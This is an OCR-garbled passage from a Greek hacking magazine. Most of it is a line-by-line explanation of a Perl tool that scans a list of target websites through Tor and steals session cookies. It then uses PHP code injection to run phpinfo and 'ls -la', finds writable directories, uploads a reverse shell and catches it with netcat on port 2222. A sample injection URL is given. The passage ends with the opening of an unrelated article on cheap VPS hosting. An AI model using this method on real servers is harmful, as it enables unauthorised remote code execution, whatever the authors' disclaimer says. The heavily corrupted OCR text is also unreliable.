ταβλητή $host παίρνει біабохіка τις τιμές που περιλαμβάνει ο πίνακας 
@list. Έτσι ο βρόχος επαναλαμβάνεται, µε τη μεταβλητἠ $host να ἐχει 
κάθε φορὰ ως τιµή τη διεύθυνση ενὸς στόχου. H γραμμὴ 17 λέει στην 
Perl να εκτελέσει την υπορουτἱνα µε ὀνομα session_id. Παρεμπιπτόντως, 
η υπορουτἱνα session_id εἰναι ακριβώς and κάτω, αλλά θα μπορούσε va 
βρίσκεται και στο τέλος του προγράμματος χωρίς να δημιουργεῖται ка- 
ποιο πρὀβλημα. 


Γραμμές 19-37. Ano εδὠ και κάτω αρχίζει το πιο ουσιαστικὀ μέρος του 
προγράμματος. Σκοπὀς αυτἠς της υπορουτίνας εἶναι να βρει και уа ano- 
θηκεύσει та session IDs (пері cookies πρὀκειται). Αν µας ρωτήσετε αν εἰ- 
ναι апараітпто κάτι τέτοιο θα σας πούμε πως, val, εἶναι! Ката τις δοκιμὲς 
μας, τα μηχανήματα-στὀχοι δεν аутапокріуоутау ὁπως θα έπρεπε (όπως 
θα θέλαμε δηλαδή) χωρίς то αντίστοιχο session ID. 


Στη γραμμὴ 21 ζητάμε апо τον browser να περάσει το νέο αἰτημα апо 
vav proxy. Σε αυτή την περίπτωση Χρησιμοποιούμε τον polipo proxy 
server σε συνδυασμὀ µε το tor, το опоіо τρέχει στο μηχάνημά µας. Στη 
γραμμὴ 22 ο browser στέλνει Eva αἰτημα προς τον υποψήφιο στὀχο και 
το αποτέλεσμα --η απὀκριση του ѕегуег-- αποθηκεύεται στη μεταβλητή 
$response. 


Στη үраниг 23 γίνεται ἐλεγχος αν To αἰτημα (η κλήση προς то URL) 
ἦταν επιτυχἠς. Συγκεκριµένα, ελέγχεται αν ο server απάντησε «φυσιο- 
λογικὰ» ἡ µε κἀποιο μήνυμα λάθους, ὁπως, N.X., εἶναι το «404 not found». 
O ἐλεγχος γίνεται µέσω της πρὀτασης if. Επειδἠ θα συναντήσουμε την 
if αρκετὲς φορές στο πρὀγραμμα, кало θα ἦταν να κάνουμε µια μικρὴ 
αναφορά στη δομὴ και στη λειτουργία της. Οι προτάσεις if ελέγχουν τη 
рођ εκτέλεσης ενός προγράμματος, αποφασἰζοντας то αν θα εκτελεστεί 
ἡ OXI ша περιοχἠ του κὠδικα (ονομάζεται και μπλοκ κὠδικα). Αυτή η 
απόφαση λαμβάνεται σύμφωνα µε την ἐκβαση µιας συνθήκης, την οποία 
προσδιορἰζουμε αμέσως μετὰ τη λέξη if. Па уа κατανοήσετε τη δομή µιας 
πρότασης if, Seite τη λογικἠ της ακόλουθης αναπαράστασης: 


if (συνθήκη προς έλεγχο ) { 
μπλοκ κώδικα 


} 


Αν η συνθήκη προς ἐλεγχο εἶναι αληθἠς (true), τότε το μπλοκ του κὠδι- 
ка που ακολουθεί και περικλείεται σε αγκύλες εκτελείται. Αν η συνθήκη 
εἶναι ψευδής (false) τότε το μπλοκ κὠδικα που ακολουθεἰ δεν εκτελείται. 
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Υπάρχουν περιπτώσεις στις οποἰες επιθυμούμε να εκτελεἰται ἑνα κοµ- 
μάτι κὠδικα ὁταν µια συνθήκη εἶναι αληθὴς κι Eva διαφορετικὀ κομμάτι 
κώδικα, ὅταν η ἴδια συνθήκη εἶναι ψευδής -- και μόνο τότε. Σε αυτὲς τις 
περιπτώσεις η πρὀταση if µπορεί уа ғпектабгі, µε τη βοήθεια της else. 
Παρακάτω φαίνεται Eva αφηρημένο παράδειγµα: 


if ( συνθήκη προς έλεγχο ) í 
τύπωσε "delta" 
y else í 


τύπωσε "Hacker" 


) 


Το μήνυμα «delta» τυπώνεται μόνον αν η συνθήκη προς ἐλεγχο εἰναι 
αληθής, ενώ το μήνυμα «Hacker» τυπώνεται μόνον ὁταν η συνθήκη εἶναι 
ψευδής. 


Στη γραμμή 23, λοιπὸν, ελέγχεται το αν η κλήση ἦταν επιτυχής. Αν ἦταν, 
εκτελεἰται το μπλοκ κὠδικα που ξεκινά στη γραμμή 24. Ἔτσι, Ta header 
της κλήσης καταχωρούνται στη μεταβλητήἠ $headers και στην επόμενη 
γραμμὴ ξεκινά µια νέα πρόταση if. Αυτή τη φορὰ γίνεται ἐλεγχος του 
αν η μεταβλητή $headers περιέχει τη συμβολοσειρά «Set-Cookie: (.*); 
path=/>. Σε αυτή τη συμβολοσειρά, το «(.*)» αποτελεἰ το ζητοὐμενό 
μας, καθὼς περιέχει το session ID. Αν η ἐκφραση εἶναι αληθής, τότε στη 
γραμμὴ 26 καταχωρεἰται то session ID στη μεταβλητή $session_id. Στις 
γραμμές 27-28 εκτυπώνεται στην οθόνη το session ID και στη γραμμὴ 39 
το проүрарра περνάει στην υπορουτίνα check. 


Αν η πρόταση if στην γραμμή 25 επιστρέψει false, η συμβολοσειρά 
που αναζητάμε δεν βρέθηκε και то πρὀγραμμα εκτελεἰ το μπλοκ κὠδι- 
ка των γραμμών 30 και 31. Έτσι, εκτυπώνει το αντίστοιχο μήνυμα ка! 
το πρόγραμμα περνάει στον επόμενο υποιήφιο στόχο του πίνακα @list 
(αυτό γίνεται µε την εντολἠ next). Το ἴδιο συμβαίνει και στην περίπτωση 
που η πρὀταση if тпс γραμμἠς 23 επιστρέψει false. AUTO θα σημαίνει От! 
η αἰτηση που ¿Kave o browser προς το στὀχο δεν ἦταν επιτυχἠς. Σε αυτή 
την περίπτωση εκτελείται το μπλοκ στις γραμμές 34 και 35, ενὼ στη 
συνέχεια το πρὀγραμμα περνάει στον επόμενο υποψήφιο отоҳо (και пал! 
µέσω της next). 


Με την ευκαιρία, να πούμε От! η εντολἠ next τερματίζει την τρἐχουσα 
επανάληψη ενὸς βρὀχου και ξεκινά την επόμενη. Στην περἰπτωσἠ µας то 
πρόγραµµα επιστρέφει στην apx του βρὀχου foreach (γραμμή 13) και 
τον επαναλαμβάνει, αφού όμως δώσει στη μεταβλητή $host την επόμενη 
τιμή. 


Γραμμές 39-57. Εδὠ βρίσκεται η υπορουτίνα check. Δουλεία της εἰναι 
να ελέγχει то αν θα εκτελεστεἰ η συνάρτηση phpinfo στο στόχο. Στη 
γραμμὴ 41 καταχωρούμε στη μεταβλητή $vuln_path то URL που θα Ka- 
λέσουμε. Στη 42 επιβάλουμε µια καθυστέρηση 1 δευτερόλεπτου, πριν TO 
πρόγραμμα πραγματοποιήσει την επόμενη αἰτηση. Έπειτα, στη γραμμή 
44, γίνεται Evwon των τιμών των μεταβλητών $host και $vuln_path µε 
τον τελεστή συνένωσης (µια τελεία). Κατόπιν ξεκινάει µια νέα κλήση 
προς Tov server, η οποία πλέον περιέχει ка! то session ID. H κλήση που 
πραγματοποιείται εἶναι της µορφής: 


http://site.com/index.php?page=xek();function PHPST_PAGENAME | 
XEK()(phpinfo();) 
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NÑ Applications Places System |Р | τ Sun Jan 8, 1:15 PM To npoypappata- 
ΚΙ µας σε δράση. 
Μόλις το τρέξαμε 

ΚΙ ο πρώτος κιόλας 
server mou αναφέ- 
ρεται στο αρχείο µε 
τους στὀχους (site. 
txt) εἶναι ευόλω- 
τος. To πρὀγραμμά 
μας εντόπισε ὁλους 
τους καταλόγους 
στους οποίους 
έχουµε δικαίω- 

μα εγγραφής και 
ανέβασε το shell µε 
επιτυχία! 


τπτ ΓΙ root@bt: ~/Desktop 


Το αποτέλεσµα καταχωρεἰται στη μεταβλητή $response. Στη γραμμή 45 
ελέγχεται αν η κλήση ἦταν επιτυχἠς. Σε περίπτωση που δεν ἦταν, EKTE- 
Літа το μπλοκ κὠδικα στις γραμμές 54-55. Αν пал η κλήση ἦταν επιτυ- 
χἠς, στη γραμμὴ 46 γἱνεται ἑνας νέος ἐλεγχος if: Елеүхета! αν η απάντη- 
ση ano Tov server περιέχει την ακόλουθη συμβολοσειρά: 


<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFO 
LLOW,NOARCHIVE" /></head> 


Εφόσον επιστρέψει αληθές, τότε η συνάρτηση phpinfo εκτελέστηκε µε 
επιτυχία στον server και το πρὀγραμμα εκτυπώνει στο τερματικὀ το pñ- 
уона της үранийс 47. Ἐπειτα περνάει στην υπορουτἱνα check_dirs. Σε 
περίπτωση που ο έλεγχος της γραμµἠς 46 επιστρέψει false, εκτελείται то 
μπλοκ στις γραμμές 50-51. 


Γραμμές 59-73: Αυτή η υπορουτίνα προσπαθεἰ να εκτελέσει στον server 
την εντολὴ Is -la, µέσω της συνάρτησης system. Φυσικά, αν πρὀκειται 
για Windows server ñ αν η εκτέλεση της συνάρτησης εἰναι απαγορευμένη 
(πολύ πιθανὀ για λὀγους ασφάλειας), η εντολἠ δεν θα εκτελεστεί. 
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Στη γραμμή 61 ορἰζουμε τη μεταβλητή $dir command. H μεταβλητή 
αυτή, μεταξύ ἄλλων, περιέχει την EVTOAN «Is -la> σε popp κωδικών 
ASCII. Στη γραμμὴ 64 το προγραμματὰάκι µας προσπαθεί να εκτελέσει την 
εντολἠ στο στὀχο. Γίνεται µια νέα κλήση προς то server, αποδίδοντας 
και πάλι το αποτέλεσμα στη μεταβλητή $response. H τιµή της $response 
ελέγχεται στη γραμμὴ 65. Αν η κλήση ολοκληρώθηκε µε επιτυχία, avoi- 
үкі το αρχείο results.txt για εγράφη (χρησιμοποιούμε то filehandle 
SOURCEFILE). Εδώ να τονίσουμε ότι αν δεν υπάρχει το αρχείο results.txt, 
τότε δημιουργείται αυτόματα στον τρἐχοντα κατάλογο. Στη γραμμή 67, 
τα περιεχόμενα της $response, δηλαδή η απὀκριση του server µετά την 
τελευταία κλήση, αντιγράφονται στο αρχείο results.txt µέσω της print. 
Στη γραμμὴ 68 κλείνει το αρχείο µε то filehandle SOURCEFILE και то npo- 
γραµµα περνάει στην υπορουτίνα directories (γραμμή 69). 


Κάπου εδὠ πιστεύουμε πως ἐχετε αρχίσει να καταλαβαίνετε τη λογική 
του προγράµµατος -- алла και της Perl γενικότερα. Έτσι, θα κάνουμε Eva 
σύντομο διάλειμμα απὸ την ανάλυση του προγράµµατος και θα πούμε 
δυο λόγια για τα δικαιώματα (permissions) των αρχείων στα συστήματα 
Unix/Linux. 


Δικαιώματα αρχείων 


Όταν EKTEAOUHE την εντολἠ 15 -la σε Eva σύστημα Unix/Linux, παίρνουμε 
κάποιες πληροφορἱες σχετικἀ µε τα αρχεία του τρἐχοντος καταλόγου. H 
εκτέλεση της εντολἠς επιστρέφει γραμμὲς σαν την ακόλουθη: 


drwxrwxrwx 1 Giannis Giannis 3000 10/01/11 music 


Παρατηρούμε πως η πρώτη στήλη περιέχει 10 χαρακτήρες. Όταν n үран- 
μή αναφέρεται σε κἄποιον κατάλογο, ο πρῶτος χαρακτήρας εἶναι то «а». 
Αν ὁμως πρὀκειται για капою απλὀ αρχείο, ο πρώτος χαρακτήρας εἶναι 
µια παύλα (<->). Οι επόμενοι 3 χαρακτήρες δηλώνουν τα δικαιώματα του 
ιδιοκτήτη του καταλόγου (ñ του αρχείου), το ὀνομα του οποίου εμφα- 
νίζεται στην τρίτη στήλη. Τα πιθανά δικαιώματα εἶναι η ανάγνωση που 
συμβολίζεται µε то γράμμα «г», η εγγραφἠ που συμβολίζεται µε то γράμ- 
на «м» και η εκτέλεση που συμβολίζεται µε το γράμμα «х». Εάν капоо 
ano αυτά τα δικαιώματα *dev* παρέχεται, στη θέση του αντίστοιχου Xa- 
ρακτήρα εμφανίζεται πάλι µια παύλα (<->). Επίσης, τα δικαιώματα ava- 
φέρονται πάντα µε τη σειρἀ που τα αναφέραμε κι εμεἰς. Έτσι, ὁταν για 
παράδειγµα ο ιδιοκτήτης EXE! πλήρη δικαιώματα, οι τρεις χαρακτήρες που 
εξετάζουμε θα εἶναι Οἱ «rwx». H επόμενη τριάδα χαρακτήρων δείχνει τα 
δικαιώματα των χρηστών που ανήκουν στο ἰδιο user group (το буора του 
group εµφανίζεται στη στήλη 4). H τελευταία τριάδα χαρακτήρων δείχνει 
τα δικαιώματα όλων των υπολοίπων χρηστών του συστήματος... 


H στήλη 2 εμφανίζει συνήθως τον αριθµό 1, αν πρὀκειται για κἄποιο ap- 
χεἰο ἡ τον αριθµό των υποκαταλὀγων, αν πρὀκειται για κάποιον κατάλογο. 


H στήλη 5 δείχνει το μέγεθος σε byte, ενώ η στήλη 6 την ηµεροµηνία της 
δημιουργἰας ἡ της τελευταίας τροποποίησης του αρχείου. Τέλος, η στήλη 
7 δείχνει το ὀνομα του αρχείου. 


Και μετὰ апо AUTO το σύντομο, δροσιστικὀ διάλειμμα, επιστρέφουµε στην 
ανάλυση του κὠδικα :D 


Πυτοματοποιημένη αναζήτηση αδυναμιών 
“ә  “  ” ” те ” т т” хаауаүаүауұажеа ааұаАфАе 


Γραμμές 75-92. Σκοπὸς αυτής της υπορουτἱνας εἶναι να ελέγξει αν η 
εντολἠ Is -la εκτελέστηκε µε επιτυχία στον server. AUTO το κάνει ψάχνο- 
ντας στο αρχείο results.txt για καταλόγους, στους οποίους να μπορούμε 
να γράψουμε. Όπως εἰπαμε και πριν, το αρχείο results.txt περιέχει την 
απὀκριση Tou server. Στη γραμμὴ 76 ανοίγει εκ νέου το αρχείο results. 
txt, για ανάγνωση αυτή τη фора. То ὀνομα Tou filehandle εἶναι και пал! 
το SOURCEFILE. Στη γραμμὴ 77 γίνεται αναζήτηση στο SOURCEFILE, 
µε τη βοήθεια της grep. Αυτή τη фора ψάχνουμε για τις συμβολοσειρἐς 
<drwxr- ΧΓΧ», «-Γ--Γ--Γ--», «-Γνν-Γ--Γ--», «αγννχγννχγννχ» και <-rw-r--r-->. 
Αν βρεθεἰ κἀποια εξ αυτών, η grep θα επιστρέψει ολόκληρη τη σχετικἠ 
γραμμὴ του піуака @dirs. Στη γραμμὴ 79 ελέγχεται αν ο πινάκας @dirs 
εἶναι κενὸς ἡ ὀχι. Εφόσον *ёх&!* στοιχεία, η EVTOAN Is -la εκτελέστηκε µε 
επιτυχία και το πρόγραµµα τυπώνει στην οθὀνη τα μηνύματα των Ypap- 
роу 80 και 81. 


Στη γραμμὴ 82 γίνεται και пал µια αναζήτηση για тіс συμβολοσειρές 
<drwxr-xr-x> Kal «<drwxrwxrwx», εντὸς του πίνακα @dirs. Αν βρεθούν 
στοιχειἁ που συμφωνούν, τοποθετούνται στον πἰνακα @writable_dirs. 


Αφού ανέβηκε Το shell στον 
server, το прдүрациа µας ξε- 
κίνησε το netcat και στη συ- 
νέχεια εκτέλεσε Και то Shell. 
Έτσι, στο μικρό τερµατικὀ 
που εμφανίζεται στα δεξιά της 
εικόνας φαίνεται то κέλυφος 
και η σύνδεσή µας στη γραμ- 
Hñ εντολών του server. 
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Στην enòpevn γραμμὴ (83) γίνεται ἐλεγχος του αν ο πίνακας @writable_ 
dirs εἶναι κενὸς ἡ ὀχι. Αν Χπεριέχεικ στοιχεία, εκτυπώνονται στην οθὀ- 
νη κι о ἔλεγχος του προγράµµατος μεταφέρεται στην υπορουτίνα ascii_ 
codes. Αν πράγματι υπάρχουν στοιχειὰ στον @writable_dirs, To μονό 
σίγουρο εἶναι πως η επόμενη κλήση που θα κάνει το πρόγραμμα προς Tov 
στόχο «δενΞ θα εἶναι και τόσο αθώα ;) 


Γραμμὲς 94-109. Στη γραμμὴ 95 το πρόγραμμα ζητάει να εισαγάγουµε 
τον κατάλογο ὁπου Ө” «ανέβει» To shell. O κατάλογος που θα δώσουμε 
αποθηκεύεται στη μεταβλητή $folder_name. To ἰδιο γίνεται και στη Ypap- 
μή 97, ὁπου πρέπει να εισαγάγουμε то ὀνομα που θα αποκτήσει το shell, 
отау καταλήξει στο στὀχο. Па τελευταία фора, το πρὀγραμµμα ζητάει να 
δώσουμε то URL ὁπου βρίσκεται To shell και περιμένει να ...αναλάβει 
δράση! 


Στη γραμμή 101 ορἰζεται µια νέα μεταβλητή, η $string, η οποία στην 
ουσία περιέχει την επόμενη EVTOAN που θα εκτελεστεἰ στον server. Mò- 
λις εκτελεστεί, το shell θα μεταφερθεί στον κατάλογο που καθορίσαµε 
προηγουμένως. Στη γραμμή 102 δημιουργεῖται ἑνας νέος, κενὸς πινάκας, 
με Т” ὀνομα @text. Στην επὀµενη γραμμὴ ξεκινάει ἑνας βρὀχος foreach, 
στον οποίο κάθε χαρακτήρας µέσα στη μεταβλητή $string καταχωρείται 
στη µεταβλητή $char, μετατρέπεται σε ASCII code και στο τέλος TUNO- 
νεται στον πίνακα @text. Στην γραμμὴ 106, τα στοιχειά του @text ενώ- 
νονται μεταξύ τους µε τον τελεστή τελεία και καταχωρούνται στη µετα- 
BANTA $command. Ακολούθως (γραμμή 107), προσθέτουμε στο τέλος της 
$command την κατάληξη < ).die();} <. Мета апо όλα αυτά, το πρόγραµµα 
калі την υπορουτίνα shell... 


Γραμμές 111-141. Στη γραμμὴ 113 καταχωρείται στη μεταβλητή $path 
το 20 τμήμα του URL, το οποίο θα καλέσει το πρόγραμμα µας. Το 10 τμή- 
μα εἶναι φυσικἁ η μεταβλητή $host (ο στόχος µας), ενώ TO Зо αποτελεί η 
μεταβλητή $command, στην οποία περιέχεται η προς εκτέλεση εντολή. 


Στη γραμμή 115 οι τρεις μεταβλητές που εἰδαμε παραπάνω σχηματίζουν 
μια νέα συμβολοσειρἁ. Πρόκειται για το επόμενο URL που θα καλέσει то 
πρὀγραμμἁ µας. Το αποτέλεσµα της κλήσης θα αποθηκευτεἰ στη µετα- 
βλητή $response (κλασσικά). Αν η κλήση του URL ἦταν επιτυχής, ano- 
στέλλεται Eva VEO αἱτημα (γραμμή 120) της ακὀλουθης µορφής: 


һЕжр://отбхос/о κατάλογος που εισαγαµε/το ονομα 5һе11 


Με αυτό το αἰτημα καλούμε To shell. Σε αυτό το στάδιο πραγματοποιούµε 
µόνο ша απλἠ δοκιµἠ και θέλουμε να διαπιστώσουμε μόνο то αν ανέβηκε 
στον server ñ ὀχι. Συγκεκριμένα, αυτός ο έλεγχος πραγματοποιείται στη 
γραμμὴ 122, onou ελέγχεται αν η απάντηση ano Tov server περιέχει τη 
συμβολοσειρἀ «WARNING: Failed to daemonise. This is quite common 
and not fatal.» Αυτή η συμβολοσειρά εμφανίζεται отау τρέχουμε το 
*d1KO* µας shell κι αποτυγχάνει να συνδεθεί. Εάν εσεἰς χρησιµοποιείτε 
κάποιο shell το οποίο εμφανίζει διαφορετικἀ μηνύματα, θα πρέπει να тро- 
ποποιήσετε τη γραμμὴ 122 ώστε va ψάχνει γι’ αυτά! 


Εάν ο έλεγχος στη γραμμὴ 122 επιστρέψει true, εμφανίζεται Eva μήνυμα 
που µας ειδοποιεί От! το shell έχει μεταφερθεί στον server µε επιτυχία. 
Στη γραμμὴ 124 то πρὀγραμμα ανοίγει Eva παράθυρο τερματικού στο un- 
хауцыа µας, µἐσω της συνάρτησης system. Σε αυτό то τερματικὸ EKTE- 
Літа! το netcat και περιμένει σύνδεση στο port 2222. Παρατηρεἰστε то 
σύμβολο «8», που βρίσκεται μετά то port number και λίγο πριν το τέλος 
της үранийс 124. Το σύμβολο αυτό υποχρεώνει το κέλυφος του Linux va 
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УМ ХУ Ь,ЬУУУУМ М УУУУУУУ У УУУУУУ  /У/УУ/Я/Я,,ИУИЯЯЖ 


εκκινήσει τη διεργασία στο παρασκήνιο. AUTO σηµαίνει πως η συνάρτη- 
ση system εκτελείται κι επιστρέφει τον ἐλεγχο στην Perl. H διεργασία 
(netcat), πάντως, συνεχίζει να εκτελεῖται κανονικἁ. Edw χρειάζεται λίγη 
προσοχή: Το netcat ἐχει εκτελεστεἰ апо το πρὀγραμμά µας και περιμέ- 
νει σύνδεση ото port 2222. Όταν то πρὀγραμμα περάσει στον επόμενο 
στὀχο, εφόσον εἶναι κι αυτὸς ευάλωτος, το πρόγραμμα θα ανεβάσει και 
σε αυτὀν то shell και θα προσπαθήσει να τρέξει και πάλι το netcat. Σε 
αυτό ακριβώς то στάδιο, αν εμεὶς δεν έχουμε τερματίσει то netcat που 
ξεκίνησε για τον προηγούμενο στὀχο, το πρὀγραμμὰ µας θα αποτύχει και 
θα εμφανιστεί το μήνυμα «address already іп use» (To port 2222 χρησι- 
μοποιεῖται Non). Το σκεπτικὀ µας ката τη δημιουργία του προγράμματος 
ἠταν бт! θα κάνουμε σε κάθε server οτιδήποτε θέλουμε και στη συνέχεια, 
εφόσον τερµατίζουµε τη σύνδεση και πραγματοποιούμε ἐξοδο, θα nep- 
νάμε στον επόμενο. Θα μπορούσαμε βεβαίως уа εκτελούμε πολλαπλά 
στιγμιότυπα του netcat, ὥστε уа συνδεόµαστε σε ὁλους τους ευάλωτους 


Ες ΤΘ 


Status 
Internet Connection 


NAT — Virtual Servers Setup 


Virtual Server alows you to direct incoming traffic from WAN side(identified by Protocol and External port) to the 


Internal server with private IP address on the LAN side The Internal port is required only if the external port needs to be 
converted to a differentport number used by the server on the LAN side A maximum 32 entries can be configured. 


| 192.168.1.3 m 


Port Triggering |Add} | Remove 
DMZ Host ( к 
ALG | Server Name | External Port Start | External Port End Protocol | Internal Port Start | Internal Port End | Server IP Address Remove 
Advanced Setup | | | 
etcat 2222 2222 TCP 2222 2222 
Advanced Status SSS 
Management 


server таутдхроуа. Κάτι τέτοιο θα γινόταν εὐκολα ano το πρὀγραμμὰ 
μας, απαιτώντας ano τον χρήστη va δηλώνει кі ἑνα VEO port, για κάθε £u- 
παθἠ server. Ωστόσο η ιδέα του να γεµίσουµε την επιφάνεια εργασἰας µε 
πολλαπλά στιγμιότυπα του netcat δεν µας ἄρεσε. Т” ομολογούμε: Τέτοιες 
хаотікес καταστάσεις δεν µας αρἐσουν καθόλου! 


Στη γραμμή 129 καλούμε το shell, ὥστε уа εκτελεστεἰ και να συνδεθεἰ 
στο μηχάνημά µας. To shell που aveBdoaue θα προσπαθήσει να συνδεθεί 
στο port 2222 και ката συνέπεια θα του απαντήσει το netcat. Το `Cache- 
Control’ => `max-age=0' προσθέτει στο αἰτημα προς Tov server ша ειδι- 
кй кефалЛіба (header). Αυτή προσδιορίζει ότι δεν θέλουμε την προσωρινά 
αποθηκευμένη σελἰδα (апо την cache), αλλά τη νεότερη δυνατή εκδο- 
χἠ της. Ἐτσι, θα εκτελεστεί το shell και θα αποκτήσουμε πρὀσβαση στη 
γραμμὴ εντολὠν TOU απομακρυσμένου server! 


Για να µην ξεχνιόμαστε... 


Τελειώνοντας, να σημειώσουμε πως то shell που ανεβάσαμε σε κἆθε OTO- 
хо σβήστηκε αμέσως μόλις αποκτἠσαµε πρόσβαση. Επιπρόσθετα, κλεἰσα- 
HE αμέσως το τερµατικὀ апо το опоіо εἰχαμε αποκτήσει την πρόσβαση. 
Σκοπὸς µας δεν ἦταν να προξενἠήσουµε κάποιου εἰδους ζημιά ñ αναστά- 
тооп. Όπως επανειλημμένα ¿xei αναφερθεἰ στο περιοδικὀ, κάτι που δεν 
μας ανήκει *dev* έχουμε δικαίωμα να το πειράζουμε. Εξάλλου, η ada- 
ζονεία των τυπάδων που μπαίνουν σε ξένα μηχανήματα και προξενούν 
ζημιὲς για την πλάκα τους, δείχνει μόνο το πόσο κοντόφθαλμοι και OTE- 
νόμυαλοι εἶναι. Ας συνεχίσουν ETO! και θα το βρουν μπροστὰ τους. Και θα 
φροντίσει η ἴδια η ζωή γι’ auto. 


Εἶναι μάλλον αυτο- 
νόητο, αλλά για va 
δουλέψουν σωστά 
όσα περιγράφουμε 
πρέπει να κάνουμε 
µια µικρή ρύθμιση 
στον router µας. 
Συγκεκριµένα, 
εφόσον το netcat 
θα περιμένει 
συνδέσεις στο port 
2222, ба πρέπει уа 
ενεργοποιήσουµε 
ΤΟ port forwarding 
στον router ка! 

να προωθήσουμε 
ΤΟ port 2222 στον 
υπολογιστή µας... 
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AUTO που κἀνει 
στην ουσία ἑνας 
VPS host server 
εἶναι να τρέχει 
πολλά διαφορετικά 
συστήµατα Linux, 
πάνω στο δικὀ του 
πυρήνα (kernel). 


YV HAQKER 


ÁN 


Aiyo-noAU όλοι έχουμε χρησιμοποιήσει капою web host, για Tn σελἰδα 
нас στο Internet. Υπάρχουν ορισμένες φτηνὲς υπηρεσίες, µε κόστος ро- 
Ас 56 το μήνα, nou επιτρἐπουν να ανεβάσει κανεἰς οποιαδήποτε σελἰδα 
(γραμμένη σε γλὠσσες and την PHP μέχρι την Perl) και να εἶναι διαθὲ- 
σιµη στο web µέσα σε δευτερόλεπτα. Αυτὲς οι υπηρεσίες συνιστούν τις 
φτηνότερες, ευκολότερες και ταχύτερες λύσεις για να «βγει» κανεὶς στο 
Διαδίκτυο. Ti θα λέγατε ὁμως αν καταφέἑρναµε να ἐχουμετις σελίδες µας 
στο Internet και να ελέγχουμε πλήρως το server που тіс δημοσιεύει, µε 
τα ἰδια ñ και λιγότερα χρήματα; 


Σε ато και στο επὀµενο ἆρθρο, που θα δηµοσιευτεἰ στο deltaHacker 
006, θα μιλήσουμε για το пос μπορούμε να βρούμε την ιδανικἠ εταιρεία 
VPS (virtual private server) αλλά και пос μπορούμε να φέρουμε то VPS 
στα µέτρα µας. Τι πρέπει να προσέχουμε κάθε φορά; Пос θα επιλέξουμε 
το σωστὀ VPS, για τις ανάγκες µας; Ποιο λειτουργικὸ να του βάλουμε και 
πὼς να το ρυθμἰσουμε, WOTE να σερβἱρει τις бікес µας σελίδες; Με λίγα 
λόγια, 8’ ασχοληθούμε µε την εὑρεση, την αγορά και τη ρύθμιση του õi- 
коб µας VPS για web hosting! 


Όλα ωραία και кала, θα πει κανείς, алла τι στο кало εἶναι αυτοί οι VPS, 
για τους οποίους μιλάμε τόση ора; Ας ξεκινήσουμε апо та Вата. Τα ap- 
хіка VPS προέρχονται ano τις λέξεις Virtual Private Server. Ουσιαστικά, 
πρὀκειται για EIKOVIKEG μηχανές οι οποίες ωστόσο δεν μοιάζουν και πολύ 
µε αυτὲς που έχουμε (;) συνηθίσει να φτιάχνουμε µε εφαρμογές ὁπως TO 
VMware ἡ το Virtualbox. Οι host server, στους οποίους φιλοξενούνται 
οι VPS, επίσης δεν ¿xouv VMWare ἡ VirtualBox. >” αυτούς τους server 
τρέχουν ειδικὲς εφαρμογές virtualization, οι οποίες αποτελούν κομμάτι 
του πυρήνα (kernel) του συστήματος! О εν λόγω εφαρμογὲς δεν εξομοι- 
@vouv πλήρως το hardware των VPS αλλά χρησιμοποιούν εν μέρει *ка!* 
το αληθινό hardware του υπολογιστἠ που τις τρέχει (host server). П’ au- 
τούς τους λόγους, οι VPS αναφέρονται και ως containers. Όλα αυτά όμως 
αποτελούν λεπτομέρειες που σπάνια θα µας απασχολούν... 


VPS - first contact 


“4” 


As OpenVZ 


The-really-cheap-VPS quest 


Ὅπως καταλαβαίνετε, θα προσπαθήσουμε va εντοπίσουµε την καλύτε- 
pn δυνατή προσφορά. Δεν θα εἶχε πολὺ νόημα ἄλλωστε να δώσουμε 
περισσότερα χρήματα an’ ὁσα θα δίναμε σε κάποιον web host, εφόσον 
πρὀκειται να κάνουμε την ἴδια δουλειὰ και μόνο. Ευτυχώς για µας, η 
αναζήτηση φτηνών VPS απασχολεἰ полу κόσμο και υπάρχουν аркетес 
(ка! χρησιμότατες) πηγὲς ενημέρωσης. Μέχρι πριν ano λίγες εβδομάδες, 
η κύρια πηγἠ προσφορών και ειδήσεων για φθηνοὺς VPS, ἦταν το Low 
End Box (lowendbox.com). Δυστυχώς, ο ιδιοκτήτης ка! μόνος арӨроүра- 
фос Tou site, μετὰ апо τέσσερα χρόνια αποφάσισε ὁτι δεν τον ενδιαφέρει 
πλέον το ζήτημα και κάπως ἐτσι µας ἄφησε στα κρύα του λουτρού. Ас 
ευχηθούμε να αλλάξει γνώμη και να συνεχίσει, καθώς αποτελεἰ Eva an’ 
τα πλέον διάσημα site της катпүоріас̧. 


Μια ακόµα кал πηγἠ προσφορών και νέων εἰναι το Web Hosting Talk 
(www.webhostingtalk.com). Πρόκειται για forum µε θέματα γύρω апд το 
web hosting γενικότερα, για server αλλά και για VPS. Οι εταιρἰες του 
χώρου ανεβάζουν καθημερινά τις προσφορές τους σε αυτό то site και, 
χάρη στις λειτουργίες που προσφἑρει Eva forum, οι χρήστες μπορούν va 
σχολιάζουν αμέσως την εταιρἰα, την προσφορά της, τα τυχὸν προβλήμα- 
τα που ενδἐχεται να ἐχουν συναντήσει μαζί της στο παρελθὀν και πάει 
λέγοντας. 


Πάντως, то πολὺ φθηνό εἶναι σπάνια кало, ενώ και οι απάτες εἶναι gni- 
σης στο πρόγραμμα! КЛасіко παράδειγµα αποτελούν οι εταιρείες που 
εμφανίζονται апо το πουθενἀ, δίνουν µια πολύ καλἠ προσφορὰ και μόλις 
μαζέψουν αρκετά χρήματα χάνονται niow ano ἑνα ανελέητο connection 
refused, κἀποιο «404 Not Found» και άλλα τέτοια... Ευτυχώς, οι εταιρείες 
αυτού του εἶδους ξεσκεπάζονται αµέσως απὀ τα µέλη του Low End Box 
και του Web Hosting Talk. Άλλωστε, όταν βλέπουμε προσφορά για server 
µε 2GB RAM για μόλις $5 το µήνα, πρέπει уа το ψυλλιαζόμαστε: It’s too 
good to be true! 


Μολαταύτα, υπάρχουν ορισμένες εταιρεἰες nou δραστηριοποιούνται πολ- 
Ха χρόνια στο χώρο και προσφέρουν αρκετά καλὲς υπηρεσίες, αν λάβου- 
µε υπόψη το ҳарпло τους κόστος. Απὸ προσωπικἠ εμπειρία μπορώ να 
πω бт! η QuickWeb (www.quickweb.co.nz) προσφέρει πολὺ καλἠ ποιότητα 
υπηρεσιών, χωρἰς κολλήματα και µε τεχνικἠ υποστήριξη που θα ζήλευαν 
πολλὲς ακριβὲς εταιρείες. Το πακέτο που χρησιμοποιώ περιλαμβάνει VPS 
με 256MB RAM, 384MB burst!, 10GB αποθηκευτικού χώρου και 25068 
